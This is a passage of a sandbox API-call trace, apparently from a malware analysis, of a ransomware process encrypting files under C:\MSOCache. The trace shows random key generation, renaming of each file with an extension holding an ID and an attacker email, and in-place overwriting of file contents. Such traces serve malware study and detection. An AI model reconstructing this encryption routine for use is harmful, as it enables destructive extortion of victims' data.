	[0081.723] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0081.723] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0081.723] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0081.723] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0081.723] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0081.724] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0081.724] GetProcessHeap () returned 0x540000
	[0081.724] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5fb768
	[0081.724] lstrcpyW (in: lpString1=0x5fb768, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0081.724] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0081.724] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0081.728] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x484
	[0081.728] GetProcessHeap () returned 0x540000
	[0081.728] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb768 | out: hHeap=0x540000) returned 1
	[0081.728] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1872) returned 1
	[0081.728] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x750
	[0081.728] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0081.729] GetProcessHeap () returned 0x540000
	[0081.729] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0081.729] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0081.729] WriteFile (in: hFile=0x484, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0081.731] WriteFile (in: hFile=0x484, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0081.731] WriteFile (in: hFile=0x484, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0081.731] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x750) returned 0x5fb768
	[0081.731] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x750) returned 0x5fbec0
	[0081.731] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0081.731] ReadFile (in: hFile=0x484, lpBuffer=0x5fb768, nNumberOfBytesToRead=0x750, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb768*, lpNumberOfBytesRead=0x3a1f778*=0x750, lpOverlapped=0x0) returned 1
	[0081.731] SetFilePointer (in: hFile=0x484, lDistanceToMove=-1872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0081.732] WriteFile (in: hFile=0x484, lpBuffer=0x5fbec0*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fbec0*, lpNumberOfBytesWritten=0x3a1f778*=0x750, lpOverlapped=0x0) returned 1
	[0081.734] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb768 | out: hHeap=0x540000) returned 1
	[0081.734] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbec0 | out: hHeap=0x540000) returned 1
	[0081.734] CloseHandle (hObject=0x484) returned 1
	[0081.735] GetProcessHeap () returned 0x540000
	[0081.735] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0081.735] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0081.735] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0081.735] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb6c0 | out: hHeap=0x540000) returned 1
	[0081.736] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb618 | out: hHeap=0x540000) returned 1
	[0081.736] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fb618
	[0081.736] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0081.736] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0081.736] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0081.736] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0081.736] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", dwFileAttributes=0x80) returned 1
	[0081.737] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 74
	[0081.737] GetProcessHeap () returned 0x540000
	[0081.737] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfa) returned 0x5b8568
	[0081.737] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab"
	[0081.737] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0081.737] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0081.742] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x484
	[0081.742] GetProcessHeap () returned 0x540000
	[0081.742] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0081.742] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=8265165) returned 1
	[0081.742] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x7e1dcd
	[0081.742] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0081.742] GetProcessHeap () returned 0x540000
	[0081.742] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0081.742] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0081.742] WriteFile (in: hFile=0x484, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0081.744] WriteFile (in: hFile=0x484, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0081.744] WriteFile (in: hFile=0x484, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0081.744] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7e1dcd) returned 0x3a20020
	[0081.745] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7e1dcd) returned 0x4210020
	[0081.745] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0081.745] ReadFile (in: hFile=0x484, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x7e1dcd, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x7e1dcd, lpOverlapped=0x0) returned 1
	[0082.230] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.230] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.230] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", dwFileAttributes=0x80) returned 1
	[0082.238] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 78
	[0082.238] GetProcessHeap () returned 0x540000
	[0082.238] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x5fb618
	[0082.238] lstrcpyW (in: lpString1=0x5fb618, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml"
	[0082.238] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.238] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.241] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x484
	[0082.241] GetProcessHeap () returned 0x540000
	[0082.241] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb618 | out: hHeap=0x540000) returned 1
	[0082.241] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1452) returned 1
	[0082.241] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x5ac
	[0082.241] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.241] GetProcessHeap () returned 0x540000
	[0082.241] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.241] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.241] WriteFile (in: hFile=0x484, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.243] WriteFile (in: hFile=0x484, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.243] WriteFile (in: hFile=0x484, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.243] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5ac) returned 0x5fb618
	[0082.243] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5ac) returned 0x5fbbd0
	[0082.243] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.243] ReadFile (in: hFile=0x484, lpBuffer=0x5fb618, nNumberOfBytesToRead=0x5ac, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb618*, lpNumberOfBytesRead=0x3a1f778*=0x5ac, lpOverlapped=0x0) returned 1
	[0082.243] SetFilePointer (in: hFile=0x484, lDistanceToMove=-1452, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.243] WriteFile (in: hFile=0x484, lpBuffer=0x5fbbd0*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fbbd0*, lpNumberOfBytesWritten=0x3a1f778*=0x5ac, lpOverlapped=0x0) returned 1
	[0082.244] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb618 | out: hHeap=0x540000) returned 1
	[0082.244] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbbd0 | out: hHeap=0x540000) returned 1
	[0082.244] CloseHandle (hObject=0x484) returned 1
	[0082.245] GetProcessHeap () returned 0x540000
	[0082.245] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.245] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0082.245] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0082.245] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb570 | out: hHeap=0x540000) returned 1
	[0082.245] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb4c8 | out: hHeap=0x540000) returned 1
	[0082.245] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fb4c8
	[0082.245] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0082.245] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0082.245] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.245] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.245] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi", dwFileAttributes=0x80) returned 1
	[0082.246] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 78
	[0082.246] GetProcessHeap () returned 0x540000
	[0082.246] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x5fb570
	[0082.246] lstrcpyW (in: lpString1=0x5fb570, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi"
	[0082.246] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.246] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.248] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x484
	[0082.248] GetProcessHeap () returned 0x540000
	[0082.248] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb570 | out: hHeap=0x540000) returned 1
	[0082.248] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2511872) returned 1
	[0082.248] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x265400
	[0082.248] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.249] GetProcessHeap () returned 0x540000
	[0082.249] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.249] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.249] WriteFile (in: hFile=0x484, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.250] WriteFile (in: hFile=0x484, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.250] WriteFile (in: hFile=0x484, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.250] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x265400) returned 0x3a20020
	[0082.251] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x265400) returned 0x3c90020
	[0082.251] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.251] ReadFile (in: hFile=0x484, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x265400, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x265400, lpOverlapped=0x0) returned 1
	[0082.396] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9eeba90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da2f0
	[0082.396] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.396] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.396] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5893c0
	[0082.396] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.396] GetLastError () returned 0x0
	[0082.396] FindNextFileW (in: hFindFile=0x5da2f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9eeba90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0082.396] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.396] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.396] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5893c0
	[0082.396] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.396] GetLastError () returned 0x0
